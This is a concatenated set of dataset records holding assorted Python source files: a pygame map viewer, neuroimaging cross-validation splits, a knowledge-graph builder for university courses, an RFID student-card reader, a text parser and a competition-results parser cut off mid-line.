required=True)\n\n parser.add_argument(\"--max\",\n help=\"The maximum number of comments to read from each file\",\n type=int,\n default=10000)\n\n args = parser.parse_args()\n\n if (args.max > 200272):\n print(\"Error: If you want to read more than 200,272 comments per file, you have to read them all.\")\n sys.exit(1)\n\n main(args)\n","sub_path":"assignments/a1/code/a1_preproc.py","file_name":"a1_preproc.py","file_ext":"py","file_size_in_byte":11443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"323760425","text":"import pygame_gui\nimport sys\nfrom io import BytesIO\nimport requests\nfrom PIL import Image\nfrom geocoder import *\nimport random\nimport os\nimport pygame\nfrom pygame_gui.elements.ui_selection_list import UISelectionList\nfrom pygame_gui.elements.ui_drop_down_menu import UIDropDownMenu\nfrom pygame_gui.elements.ui_text_entry_line import UITextEntryLine\n\nmap_file = \"map.png\"\nmap_type = \"map\"\n\n\nZOOM = 15\nll, _ = get_ll_spn(geocoder_request((\"Пермь\")))\npt = ll.copy()\n\npygame.init()\nscreen = pygame.display.set_mode((600, 450))\n\nbackground = pygame.Surface((800, 600))\nbackground.fill(pygame.Color(\"#000000\"))\n\nmanager = pygame_gui.UIManager((600, 450))\n\nmenu = UIDropDownMenu(\n options_list=[\"схема\", \"спутник\", \"гибрид\"],\n starting_option=\"схема\",\n relative_rect=pygame.Rect(0, 0, 200, 30),\n manager=manager,\n)\n\ntext_entry = UITextEntryLine(relative_rect=pygame.Rect(0, 30, 150, 30), manager=manager)\n\nsearch_button = pygame_gui.elements.UIButton(\n relative_rect=pygame.Rect((150, 30), (50, 30)), text=\"find\", manager=manager\n)\n\n\ncancel_button = pygame_gui.elements.UIButton(\n relative_rect=pygame.Rect((0, 60), (200, 30)), text=\"cansel\", manager=manager\n)\n\n\ndef render_map(ll, map_type, z=10):\n if pt:\n img = get_map_ll(ll, map_type, z=z, pt=f\"{pt[0]},{pt[1]},pm2dgl\")\n else:\n img = get_map_ll(ll, map_type, z=z)\n if img is None:\n return False\n with open(map_file, \"wb\") as file:\n img.save(map_file)\n return True\n\n\nrender_map(ll, map_type, z=ZOOM)\nclock = pygame.time.Clock()\nrun = True\nwhile run:\n time_delta = clock.tick(60) / 1000.0\n for event in pygame.event.get():\n if event.type == pygame.USEREVENT:\n if event.user_type == pygame_gui.UI_DROP_DOWN_MENU_CHANGED:\n old_map_type = map_type\n if event.text == \"схема\":\n map_type = \"map\"\n elif event.text == \"спутник\":\n map_type = \"sat\"\n elif event.text == \"гибрид\":\n map_type = \"skl\"\n res = render_map(ll, map_type, z=ZOOM)\n if not res:\n map_type = old_map_type\n\n if event.user_type == pygame_gui.UI_BUTTON_PRESSED:\n if event.ui_element == search_button:\n try:\n ll, _ = get_ll_spn(geocoder_request((text_entry.text)))\n pt = ll.copy()\n render_map(ll, map_type, z=ZOOM)\n except:\n pass\n if event.ui_element == cancel_button:\n pt = None\n render_map(ll, map_type, z=ZOOM)\n\n if event.type == pygame.QUIT:\n run = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_PAGEUP:\n if render_map(ll, map_type, z=ZOOM + 1):\n ZOOM += 1\n elif event.key == pygame.K_PAGEDOWN:\n if render_map(ll, map_type, z=ZOOM - 1):\n ZOOM -= 1\n elif event.key == pygame.K_LEFT:\n ll[0] -= 0.075 / ZOOM\n render_map(ll, map_type, z=ZOOM)\n elif event.key == pygame.K_RIGHT:\n ll[0] += 0.075 / ZOOM\n render_map(ll, map_type, z=ZOOM)\n elif event.key == pygame.K_UP:\n ll[1] += 0.05 / ZOOM\n render_map(ll, map_type, z=ZOOM)\n elif event.key == pygame.K_DOWN:\n ll[1] -= 0.05 / ZOOM\n render_map(ll, map_type, z=ZOOM)\n manager.process_events(event)\n\n manager.update(time_delta)\n\n screen.blit(background, (0, 0))\n screen.blit(pygame.image.load(map_file), (0, 0))\n manager.draw_ui(screen)\n pygame.display.update()\nos.remove(\"map.png\")\n","sub_path":"task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"381325901","text":"\nimport os.path as os\nimport tables\n\nfrom sklearn.model_selection import LeavePGroupsOut, GroupShuffleSplit, StratifiedShuffleSplit\n\nimport numpy as np\n\n\nexperiment = 'meg'\n# fmri\nif experiment == 'fmri':\n hemi = 'lh'\n method = 'multi2' # 'transfer' or 'multi'\n split_nb = 1000\n proj_dir = '/hpc/crise/wang.q/data/100_subjects_voice_classification/'\n # get data\n data_dir = proj_dir + 'data/'\n data_path = os.join(data_dir, '{}.100subjects_data.h5'.format(hemi))\n h5file = tables.open_file(data_path, driver='H5FD_CORE')\n data = h5file.root.data[:]\n y_class = h5file.root.y_class[:]\n subjects = h5file.root.subjects[:]\n h5file.close()\n x_data = data.flatten().reshape(4000,5400)\n y_target = np.array(y_class)\n\n if method == 'transfer':\n logo = GroupShuffleSplit(n_splits=split_nb, test_size=0.1)\n logo_cv = logo.split(x_data, y_target, subjects)\n cross_v = []\n for train_index, test_index in logo_cv:\n cross_v.append((train_index, test_index))\n\n cv_name = 'data/{0}_{1}splits.npy'.format(method, split_nb)\n np.save(proj_dir + cv_name, cross_v)\n\n elif method == 'multi':\n test_stimuli = [] # 1000 different sets, each set is to choose 4 stimuli from 40,\n i = 0\n while i < split_nb:\n vo1 = int(np.random.uniform(0, 20))\n vo2 = int(np.random.uniform(0, 20))\n nv1 = int(np.random.uniform(20, 40))\n nv2 = int(np.random.uniform(20, 40))\n if vo1 != vo2 and nv1 != nv2:\n i += 1\n test_stimuli.append(sorted([vo1, vo2, nv1, nv2]))\n cross_v = []\n for i in range(split_nb):\n test_index = np.array([m + n\n for m in range(0, 4000, 40)\n for n in test_stimuli[i]])\n full_index = np.arange(4000)\n train_index = np.delete(full_index, test_index)\n cross_v.append((train_index, test_index))\n cv_name = 'data/{0}_{1}splits.npy'.format(method, split_nb)\n np.save(proj_dir + cv_name, cross_v)\n\n else:\n\n cross_v = []\n stimulis = np.hstack([np.ones(20), np.zeros(20)])\n sss = StratifiedShuffleSplit(n_splits=100, test_size=0.1,\n random_state=0)\n sss_cv = sss.split(stimulis, stimulis)\n test_stimulis = []\n for train, test in sss_cv:\n test_stimulis.append(test)\n for i in range(split_nb):\n np.random.shuffle(test_stimulis)\n test_index = []\n sample_nb = 0\n for test_stimuli in test_stimulis:\n test_index.append(test_stimuli + sample_nb)\n sample_nb += 40\n test_index = sorted(np.hstack(test_index))\n test_index = np.array(test_index)\n full_index = np.arange(4000)\n train_index = np.delete(full_index, test_index)\n cross_v.append((train_index, test_index))\n cv_name = 'data/{0}_{1}splits.npy'.format(method, split_nb)\n np.save(proj_dir + cv_name, cross_v)\n\n\n\n\nelse:\n# meg\n\n hemi = 'whole'\n method = 'multi' # 'transfer' or 'multi'\n split_nb = 120\n proj_dir = '/hpc/crise/wang.q/data/meg_decode/'\n # get data\n data_dir = proj_dir + 'data/'\n data_path = os.join(data_dir, '16subjects_meg_data_aranged.h5')\n h5file = tables.open_file(data_path, driver='H5FD_CORE')\n x_data = h5file.root.X_train[:]\n y_target = h5file.root.y_train[:]\n subjects = h5file.root.s_train[:]\n h5file.close()\n\n\n if method == 'transfer':\n lpgo = LeavePGroupsOut(n_groups=2)\n lpgo_cv = lpgo.split(x_data, y_target, subjects)\n cross_v = []\n for train_index, test_index in lpgo_cv:\n cross_v.append((train_index, test_index))\n\n cv_name = 'data/{0}_{1}splits_aranged.npy'.format(method, split_nb)\n np.save(proj_dir + cv_name, cross_v)\n\n elif method == 'multi':\n cross_v = []\n stimulis = np.hstack([np.ones(288), np.zeros(288)])\n sss = StratifiedShuffleSplit(n_splits=16, test_size=0.125,\n random_state=0)\n sss_cv = sss.split(stimulis, stimulis)\n test_stimulis = []\n for train, test in sss_cv:\n test_stimulis.append(test)\n for i in range(split_nb):\n np.random.shuffle(test_stimulis)\n test_index = []\n sample_nb = 0\n for test_stimuli in test_stimulis:\n test_index.append(test_stimuli + sample_nb)\n sample_nb += 576\n test_index = sorted(np.hstack(test_index))\n test_index = np.array(test_index)\n full_index = np.arange(9216)\n train_index = np.delete(full_index, test_index)\n cross_v.append((train_index, test_index))\n cv_name = 'data/{0}_{1}splits_aranged.npy'.format(method, split_nb)\n np.save(proj_dir + cv_name, cross_v)\n\n\n\n","sub_path":"create_cv.py","file_name":"create_cv.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"394390012","text":"## Author: Boris Chan\n## Date: 22/12/2016\n## Purpose: Ploting histogram to understand features\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n## dog population\ngreyhounds = 500\nlabs = 500\n\n## height variance\ngrey_height = 28 + 4 * np.random.randn(greyhounds)\nlab_height = 24 + 4 * np.random.randn(labs)\n\n## histogram plot\nplt.hist([grey_height, lab_height], stacked=True, color=['r','b'])\nplt.show()","sub_path":"Machine Learning/ML3.py","file_name":"ML3.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"138907080","text":"#### RETRIEVING FUNCTIONS \n\n\ndef extractGroupRelations(groupings, linkages):\n #clean list\n count = 0\n for line in linkages: \n spl = line.split()\n if len(spl) > 3:\n if '\"' in spl[0] and spl[1]:\n newLine=spl[0]+spl[1] + ' '+' '.join(spl[2:])\n linkages[count] = newLine.replace('\"', '')\n \n if '\"' in spl[-1] and spl[-2]:\n newLine=' '.join(spl[0:2]) + ' ' + spl[-2]+spl[-1] \n linkages[count] = newLine.replace('\"', '')\n count = count +1\n\n cleaned_linkages = linkages\n # verify if group expends on several lines: create grouping dict\n for group in groupings:\n\n # extract group name\n groupName = group.split('Group')[1].split('{')[0].strip().replace(' ', '').replace('\"', '')\n # extract relations included in grouping\n groupRelations = group.split('Group')[1].split('{')[1].replace('}', '').split() \n #clean group\n cnt=0\n for elem in groupRelations:\n if (groupRelations[cnt][0] == '\"') and (groupRelations[cnt+1][-1]=='\"'):\n groupRelations[cnt]=groupRelations[cnt]+groupRelations[cnt+1]\n groupRelations.remove(groupRelations[cnt+1])\n cnt = cnt+1\n\n # extract relations to duplicate\n toDuplicate = []\n for link in linkages:\n if (groupName in link) and ('-' in link):\n toDuplicate.append(link)\n # extract first and last relations of grouping (ie 'no from' or 'no to' task)\n firstRelation = None\n lastRelation = None\n for elem in groupRelations:\n #print('elem:'+ elem)\n hasFirst = False\n hasLast = False\n\n for link in linkages:\n #print(link)\n if elem in link.split()[0]:\n hasLast = True\n #print('has last')\n elif elem in link.split()[-1]:\n hasFirst = True\n #print('has first')\n\n if not hasFirst:\n firstRelation=elem\n elif not hasLast:\n lastRelation=elem\n else:\n pass\n\n # regenerate relations according to the type \n for relation in toDuplicate:\n chunks = relation.split()\n if groupName in chunks:\n if groupName == chunks[0].strip():\n for elem in groupRelations:\n #duplicatedRelation = firstRelation + ' ' + ' '.join(chunks[1:])\n duplicatedRelation = elem + ' ' + ' '.join(chunks[1:])\n linkages.append(duplicatedRelation) \n else: # groupName == chunks[-1].strip():\n for elem in groupRelations:\n #duplicatedRelation = firstRelation + ' ' + ' '.join(chunks[1:])\n duplicatedRelation = ' '.join(chunks[:-1]) + ' ' + elem\n linkages.append(duplicatedRelation) \n else:\n pass\n\n # remove former relations with grouping name\n cleaned_linkages = []\n for relation in linkages:\n if groupName not in relation:\n cleaned_linkages.append(relation)\n\n return cleaned_linkages\n\n\ndef extractChunks(data):\n events, internalEvents = [], []\n groupings, linkages = [], []\n roles = []\n #misc = []\n\n for line in data:\n if (line[0] != '#'):\n if ('src' in line) and ('tgt' in line):\n lineclean = line.replace('= ', '=').replace(' =', '=').replace(' = ', '=')\n events.append(lineclean)\n for elem in line.split(' '):\n if ('src' in elem) or ('tgt' in elem):\n elemclean = elem.strip().replace('tgt=', '').replace('src=', '').replace(']', '')\n if elemclean != '' and (elemclean not in roles):\n roles.append(elemclean)\n elif ('-' in line) and ('>' in line):\n linkages.append(line.strip())\n elif ('role=' in line):\n nameChunk = line.split()\n role = nameChunk.pop()\n name=''.join(nameChunk).replace('\"', '')\n cleanedInternalEvent = name+' '+ role\n internalEvents.append(cleanedInternalEvent)\n else:\n pass\n #misc.append(line)\n \n for i in range(0, len(linkages)):\n if (linkages[i][0] == '#'):\n linkages.remove(linkages[i])\n\n linkages = extractGroupRelations(groupings, linkages)\n\n chunks = {\n 'events':events,\n 'internalEvents':internalEvents,\n 'linkages':linkages,\n }\n return chunks, roles\n\n\ndef extractRoleChunks(data):\n events, internalEvents = [], []\n linkages = []\n\n for line in data:\n if (line[0] != '#'): \n if 'role=' in line:\n internalEvents.append(line)\n elif ('src=' in line) or ('tgt=' in line) or ('?(' in line) or ('!(' in line):\n events.append(line)\n elif ('-' in line) and ('>' in line):\n linkages.append(line)\n else:\n pass\n \n chunks = {\n 'events':events,\n 'internalEvents':internalEvents,\n 'linkages':linkages,\n }\n return chunks\n\n\n\ndef getLinkages(projRefs, linkages):\n for ref in projRefs:\n testRef=ref.replace('s','').replace('r', '')\n count=0\n for line in linkages:\n if testRef in line:\n lineUpd=line.strip().split(' ')\n i=0\n for elem in lineUpd:\n if (testRef == elem) and elem[0] != '#':\n lineUpd[i]=ref\n i = i+1 \n linkages[count] = ' '.join(lineUpd)\n count = count+1\n #print(linkages) \n return linkages\n\n ","sub_path":"client/api/src/utils/chunking.py","file_name":"chunking.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216792295","text":"def get_hwtacacs_host_server_cfg(self, **kwargs):\n ' Get hwtacacs host server configure '\n module = kwargs['module']\n hwtacacs_template = module.params['hwtacacs_template']\n hwtacacs_server_host_name = module.params['hwtacacs_server_host_name']\n hwtacacs_server_type = module.params['hwtacacs_server_type']\n hwtacacs_is_secondary_server = module.params['hwtacacs_is_secondary_server']\n hwtacacs_vpn_name = module.params['hwtacacs_vpn_name']\n hwtacacs_is_public_net = module.params['hwtacacs_is_public_net']\n state = module.params['state']\n result = dict()\n result['hwtacacs_server_name_cfg'] = []\n need_cfg = False\n conf_str = (CE_GET_HWTACACS_HOST_SERVER_CFG % hwtacacs_template)\n recv_xml = self.netconf_get_config(module=module, conf_str=conf_str)\n if ('' in recv_xml):\n if (state == 'present'):\n need_cfg = True\n else:\n xml_str = recv_xml.replace('\\r', '').replace('\\n', '').replace('xmlns=\"urn:ietf:params:xml:ns:netconf:base:1.0\"', '').replace('xmlns=\"http://www.huawei.com/netconf/vrp\"', '')\n root = ElementTree.fromstring(xml_str)\n hwtacacs_server_name_cfg = root.findall('hwtacacs/hwTacTempCfgs/hwTacTempCfg/hwTacHostSrvCfgs/hwTacHostSrvCfg')\n if hwtacacs_server_name_cfg:\n for tmp in hwtacacs_server_name_cfg:\n tmp_dict = dict()\n for site in tmp:\n if (site.tag in ['serverHostName', 'serverType', 'isSecondaryServer', 'isPublicNet', 'vpnName']):\n tmp_dict[site.tag] = site.text\n result['hwtacacs_server_name_cfg'].append(tmp_dict)\n if result['hwtacacs_server_name_cfg']:\n cfg = dict()\n config_list = list()\n if hwtacacs_server_host_name:\n cfg['serverHostName'] = hwtacacs_server_host_name.lower()\n if hwtacacs_server_type:\n cfg['serverType'] = hwtacacs_server_type.lower()\n if hwtacacs_is_secondary_server:\n cfg['isSecondaryServer'] = str(hwtacacs_is_secondary_server).lower()\n if hwtacacs_is_public_net:\n cfg['isPublicNet'] = str(hwtacacs_is_public_net).lower()\n if hwtacacs_vpn_name:\n cfg['vpnName'] = hwtacacs_vpn_name.lower()\n for tmp in result['hwtacacs_server_name_cfg']:\n exist_cfg = dict()\n if hwtacacs_server_host_name:\n exist_cfg['serverHostName'] = tmp.get('serverHostName').lower()\n if hwtacacs_server_type:\n exist_cfg['serverType'] = tmp.get('serverType').lower()\n if hwtacacs_is_secondary_server:\n exist_cfg['isSecondaryServer'] = tmp.get('isSecondaryServer').lower()\n if hwtacacs_is_public_net:\n exist_cfg['isPublicNet'] = tmp.get('isPublicNet').lower()\n if hwtacacs_vpn_name:\n exist_cfg['vpnName'] = tmp.get('vpnName').lower()\n config_list.append(exist_cfg)\n if (cfg in config_list):\n if (state == 'present'):\n need_cfg = False\n else:\n need_cfg = True\n elif (state == 'present'):\n need_cfg = True\n else:\n need_cfg = False\n result['need_cfg'] = need_cfg\n return result","sub_path":"Data Set/bug-fixing-4/9aabe704526857ab9b4c7877f5e1b9e60d4ecb9b--bug.py","file_name":"9aabe704526857ab9b4c7877f5e1b9e60d4ecb9b--bug.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"571884347","text":"import rdflib\nimport pandas\nfrom rdflib import Graph, Namespace, RDF, RDFS, BNode, Literal, URIRef\nfrom rdflib.namespace import DC, FOAF, XSD\nimport math\n\ndef create_university(kGraph, universityClass, ISPData):\n\textend=\"1\"+\"_\".join(\"Concordia University\".split())\n\tuniversityInstance=URIRef(ISPData+\"university/\"+extend)\n\tkGraph.add((universityInstance, RDF.type, universityClass))\n\tkGraph.add((universityInstance, FOAF.name, Literal(str(\"Concordia University\"))))\n\tkGraph.add((universityInstance, DC.source, Literal(str(\"http://dbpedia.org/page/Concordia_University\"))))\n\t\n\treturn kGraph, universityInstance\n\ndef create_courses(courses, kGraph, universityInstance, courseClass, ISPData, ISPSchema):\n\tcourseIntances_id=dict()\n\t\n\tfor loop in range(0,len(courses)):\n\t\tcourse=courses[loop]\n\t\t\n\t\tkey=course['Course Subject']+\":\"+str(course['Course Number'])\n\t\textend=course['Course Subject']+\"_\"+str(course['Course Number'])\n\t\tcourseInstance=URIRef(ISPData+\"courses/\"+str(loop)+extend)\n\t\tkGraph.add((courseInstance, RDF.type, courseClass))\n\t\tkGraph.add((courseInstance, FOAF.name, Literal(str(course['Course Name']))))\n\t\tkGraph.add((courseInstance, DC.subject, Literal(str(course['Course Subject']))))\n\t\tkGraph.add((courseInstance, DC.identifier, Literal(course['Course Number'])))\n\t\tdesp=course['Course Description']\n\t\tif type(desp)==float:\n\t\t\tdesp=\"\"\n\t\tkGraph.add((courseInstance, DC.description, Literal(desp)))\n\t\tkGraph.add((courseInstance, RDFS.seeAlso, Literal(str(course['Link']))))\n\t\tkGraph.add((universityInstance, ISPSchema.coversCourse, courseInstance))\n\t\tcourseIntances_id[key]=courseInstance\n\treturn kGraph, courseIntances_id\n\t\n\ndef create_topics(courseIntances_id, kGraph, topicClass, topics, ISPData, ISPSchema):\n\t\n\tins=0\n\tfor loop in range(0,len(topics)):\n\t\ttopic=topics[loop]\n\t\t\n\t\tkey=topic['Course Subject']+\":\"+str(topic['Course Number'])\n\t\tif key in courseIntances_id:\n\t\t\textend=\"_\".join(topic['Topic'].split())\n\t\t\ttopicInstance=URIRef(ISPData+\"topics/\"+str(loop)+extend)\n\t\t\tins+=1\n\t\t\tkGraph.add((topicInstance, RDF.type, topicClass))\n\t\t\tkGraph.add((topicInstance, FOAF.name, Literal(str(topic['Topic']))))\n\t\t\tkGraph.add((topicInstance, DC.source, Literal(str(topic['URI']))))\n\t\t\tkGraph.add((courseIntances_id[key], ISPSchema.hasPart, topicInstance))\n\t\n\tprint(ins)\n\treturn kGraph\n\t\n\t\ndef create_students(kGraph, studentClass, students, universityInstance, ISPData, ISPSchema, DBP):\n\tstudentIntances_id=dict()\n\t\n\tfor loop in range(0,len(students)):\n\t\tstudent=students[loop]\n\t\t\n\t\tkey=str(student['ID Number'])\n\t\textend=str(student['ID Number'])\n\t\tstudentInstance=URIRef(ISPData+\"students/\"+extend)\n\t\tkGraph.add((studentInstance, RDF.type, studentClass))\n\t\tkGraph.add((studentInstance, FOAF.givenName, Literal(str(student['FirstName']))))\n\t\tkGraph.add((studentInstance, FOAF.familyName, Literal(str(student['LastName']))))\n\t\tkGraph.add((studentInstance, DBP.id, Literal(str(student['ID Number']))))\n\t\tkGraph.add((studentInstance, FOAF.mbox, Literal(str(student['Email']))))\n\t\tkGraph.add((studentInstance, ISPSchema.studiesAt, universityInstance))\n\t\tstudentIntances_id[key]=studentInstance\n\t\t\n\t\n\treturn kGraph, studentIntances_id\n\t\ndef create_grades(kGraph, gradeClass, grades, studentIntances_id, DBP, courseIntances_id, ISPData, ISPSchema):\n\t\n\tfor loop in range(0,len(grades)):\n\t\tgrade=grades[loop]\n\t\t\n\t\tkeyStudent=str(grade['Student ID'])\n\t\tkeyCourse=\":\".join(grade['Course ID(COMP 464)'].split())\n\t\t\n\t\tif keyStudent in studentIntances_id and keyCourse in courseIntances_id:\n\t\t\tgradeInstance=URIRef(ISPData+\"course_grades/\"+str(loop))\n\t\t\tkGraph.add((gradeInstance, RDF.type, gradeClass))\n\t\t\tkGraph.add((gradeInstance, DC.subject, courseIntances_id[keyCourse]))\n\t\t\tkGraph.add((gradeInstance, DBP.score, Literal(str(grade['Grade']))))\n\t\t\tkGraph.add((gradeInstance, DBP.termPeriod, Literal(str(grade['Term']))))\n\t\t\tkGraph.add((studentIntances_id[keyStudent], ISPSchema.tookCourse, gradeInstance))\n\t\t\t\n\t\n\treturn kGraph\n\t\n\t\n\t\n\t\nbaseGraphFile=\"universityKG.ttl\"\n\nkGraph=Graph()\nkGraph.parse(baseGraphFile, format=\"ttl\")\n\t\nDBP=Namespace(\"http://dbpedia.org/property/\")\nISPSchema=Namespace(\"http://intelligentsystemproj1.io/schema#\")\nISPData=Namespace(\"http://intelligentsystemproj1.io/data/\")\n\n##CSV files to be created\nuniversitiesCSVname=r\"CSV\\Universities.csv\"\ncoursesCSVname=r'CSV\\Courses.csv'\ntopicsCSVname=r\"CSV\\Topics.csv\"\nstudentsCSVname=r\"CSV\\Students.csv\"\ngradesCSVname=r\"CSV\\Grades.csv\"\n\ncourseClass\t=\tISPSchema.Course\nuniversityClass\t=\tISPSchema.University\ntopicClass\t=\tISPSchema.Topic\nstudentClass\t=\tISPSchema.Student\ngradeClass\t=\tISPSchema.CourseGrade\n\ncourses\t=\tpandas.read_csv(coursesCSVname).to_dict('records')\ntopics\t=\tpandas.read_csv(topicsCSVname).to_dict('records')\nstudents\t=\tpandas.read_csv(studentsCSVname).to_dict('records')\ngrades\t=\tpandas.read_csv(gradesCSVname).to_dict('records')\n\nkGraph, universityInstance\t=\tcreate_university(kGraph, universityClass, ISPData)\nkGraph, courseIntances_id\t=\tcreate_courses(courses, kGraph, universityInstance, courseClass, ISPData, ISPSchema)\nkGraph\t=\tcreate_topics(courseIntances_id, kGraph, topicClass, topics, ISPData, ISPSchema)\nkGraph, studentIntances_id\t=\tcreate_students(kGraph, studentClass, students, universityInstance, ISPData, ISPSchema, DBP)\nkGraph\t=\tcreate_grades(kGraph, gradeClass, grades, studentIntances_id, DBP, courseIntances_id, ISPData, ISPSchema)\nkGraph.serialize(destination='DataGraph.ttl', format='turtle')\n\n\t\n","sub_path":"3CreateKnowledgeGraph.py","file_name":"3CreateKnowledgeGraph.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"36449349","text":"hash=dict()\ndef go(s,count):\n G=tuple(s)\n if((G,count) in hash): return hash[(G,count)]\n if(len(s)==1):return count\n maxx,flag=0,0\n if(s[0]-s[1]==1):\n l=s.copy()\n flag=1\n l.pop(0)\n maxx=max(maxx,go(l,count+1)) \n if(s[len(s)-1]-s[len(s)-2]==1):\n l=s.copy()\n flag=1\n l.pop()\n maxx=max(maxx,go(l,count+1)) \n for i in range(1,len(s)-1):\n if(s[i]!=0):\n if((s[i]-s[i+1]==1) or (s[i]-s[i-1]==1)):\n flag=1\n l=s.copy()\n l.pop(i)\n maxx=max(maxx,go(l,count+1))\n if(flag==0):\n hash[(G,count)]=count\n return count\n hash[(G,count)]=maxx\n return maxx\nn=int(input())\nl=input()\narr=[(ord(x)-97) for x in l]\nprint(go(arr,0))\n","sub_path":"XXX/brute.py","file_name":"brute.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"467942644","text":"import hid\nimport datetime\nfrom app.mod_rfid.models import Student, Reads\nfrom peewee import DoesNotExist\n\ndevice_product_name = 'SYC ID&IC USB Reader'\ndevice = None\n\ndef find_device():\n for d in hid.enumerate():\n keys = list(d.keys())\n keys.sort()\n for key in keys:\n #print(\"%s : %s\" % (key, d[key]))\n if key == 'product_string' and d[key] == device_product_name:\n print('Opening ' + device_product_name + '...')\n\n _device = hid.device()\n _device.open(d['vendor_id'], d['product_id'], d['serial_number'])\n return _device\n if device is not None:\n return None\n\ndef read_device_data(device):\n # enable non-blocking mode\n device.set_nonblocking(1)\n\n print(\"Reading the data...\")\n card = []\n while True:\n try:\n d = device.read(4)\n if d:\n if type(d) is list:\n char = d[2]\n if char > 0:\n if char < 39:\n card.append(str(char - 29))\n elif char == 39:\n card.append(str(0))\n if len(card) == 10:\n card_id = \"\".join(card)\n\n student_name = input(\"Enter name: \")\n record_card_student(card_id, student_name)\n\n exit()\n except KeyboardInterrupt as e:\n print(\"\\n\\nSo long and thanks for all the cards!\")\n exit()\n\n\ndef record_card_student(card_id, student_name):\n #student = None\n student = Student.create(rfid_id=card_id, name=student_name, last_seen = datetime.datetime.now())\n\n print(\"Student recorded: \" + student.name)\n\n\nreader_device = find_device()\n\nif reader_device is None:\n raise Exception('Could not find any mathing device for the following name: ' + device_product_name)\nelse:\n print(\"Connected to device!\")\n print(\" Manufacturer: %s\" % reader_device.get_manufacturer_string())\n print(\" Product: %s\" % reader_device.get_product_string())\n print(\" Serial No: %s\" % reader_device.get_serial_number_string())\n\n read_device_data(reader_device)\n","sub_path":"add_student_mac.py","file_name":"add_student_mac.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"135494023","text":"def printCompetitor(competitor):\r\n '''\r\n Given the data of a competitor, the function prints it in a specific format.\r\n Arguments:\r\n competitor: {'competition name': competition_name, 'competition type': competition_type,\r\n 'competitor id': competitor_id, 'competitor country': competitor_country,\r\n 'result': result}\r\n '''\r\n competition_name = competitor['competition name']\r\n competition_type = competitor['competition type']\r\n competitor_id = competitor['competitor id']\r\n competitor_country = competitor['competitor country']\r\n result = competitor['result']\r\n\r\n print(f'Competitor {competitor_id} from {competitor_country} participated in {competition_name} ({competition_type}) and scored {result}')\r\n\r\n\r\ndef printCompetitionResults(competition_name, winning_gold_country, winning_silver_country, winning_bronze_country):\r\n '''\r\n Given a competition name and its champs countries, the function prints the winning countries\r\n in that competition in a specific format.\r\n Arguments:\r\n competition_name: the competition name\r\n winning_gold_country, winning_silver_country, winning_bronze_country: the champs countries\r\n '''\r\n undef_country = 'undef_country'\r\n countries = [country for country in [winning_gold_country,\r\n winning_silver_country, winning_bronze_country] if country != undef_country]\r\n print(\r\n f'The winning competitors in {competition_name} are from: {countries}')\r\n\r\n\r\ndef key_sort_competitor(competitor):\r\n '''\r\n A helper function that creates a special key for sorting competitors.\r\n Arguments:\r\n competitor: a dictionary contains the data of a competitor in the following format:\r\n {'competition name': competition_name, 'competition type': competition_type,\r\n 'competitor id': competitor_id, 'competitor country': competitor_country,\r\n 'result': result}\r\n '''\r\n competition_name = competitor['competition name']\r\n result = competitor['result']\r\n return (competition_name, result)\r\n\r\n\r\ndef readParseData(file_name):\r\n '''\r\n Given a file name, the function returns a list of competitors.\r\n Arguments:\r\n file_name: the input file name. Assume that the input file is in the directory of this script.\r\n Return value:\r\n A list of competitors, such that every record is a dictionary, in the following format:\r\n {'competition name': competition_name, 'competition type': competition_type,\r\n 'competitor id': competitor_id, 'competitor country': competitor_country,\r\n 'result': result}\r\n '''\r\n competitors_in_competitions = []\r\n # Part A, Task 3.4\r\n contries_by_competitor_ids = {}\r\n\r\n with open(file_name, 'r') as input_file:\r\n for line in input_file:\r\n if line[0] == '#':\r\n continue\r\n\r\n entry_parts = line.strip().split(' ')\r\n if entry_parts[0] == 'competitor':\r\n contries_by_competitor_ids[int(\r\n entry_parts[1])] = entry_parts[2]\r\n else:\r\n assert entry_parts[\r\n 0] == 'competition', f'Invalid line in input file:\\n{line}'\r\n competitors_in_competitions.append({'competition name': entry_parts[1],\r\n 'competitor id': int(entry_parts[2]),\r\n 'competition type': entry_parts[3],\r\n 'result': int(entry_parts[4]),\r\n 'competitor country': None\r\n })\r\n\r\n for entry in competitors_in_competitions:\r\n country = contries_by_competitor_ids.get(entry['competitor id'])\r\n assert country, f'Missing information for competitor: {entry[\"competitor id\"]}'\r\n entry['competitor country'] = country\r\n\r\n return competitors_in_competitions\r\n\r\n\r\ndef getValidEntriesByCompetition(competitors_in_competitions):\r\n '''\r\n Converts the entries to a more convinient structure\r\n {\r\n 'competition name': {\r\n 'type': TYPE\r\n 'entries': [\r\n entry0,\r\n entry1,\r\n entry2,\r\n ...\r\n ]\r\n }\r\n }\r\n '''\r\n entries_by_competition = {x['competition name']: {'type': x['competition type'], 'entries': []}\r\n for x in competitors_in_competitions}\r\n # Init empty lists for each competition\r\n # banned_by_competition = {x['competition name']: []\r\n # for x in entries_by_competition}\r\n\r\n for entry in competitors_in_competitions:\r\n # Create a new competition key if doesn't exist\r\n competition = entries_by_competition[entry['competition name']]\r\n\r\n competitor_entries = [x for x in competitors_in_competitions\r\n if x['competitor id'] == entry['competitor id'] and\r\n x['competition name'] == entry['competition name']]\r\n\r\n if len(competitor_entries) == 1:\r\n competition['entries'].append({'competitor id': entry['competitor id'],\r\n 'competitor country': entry['competitor country'],\r\n 'result': 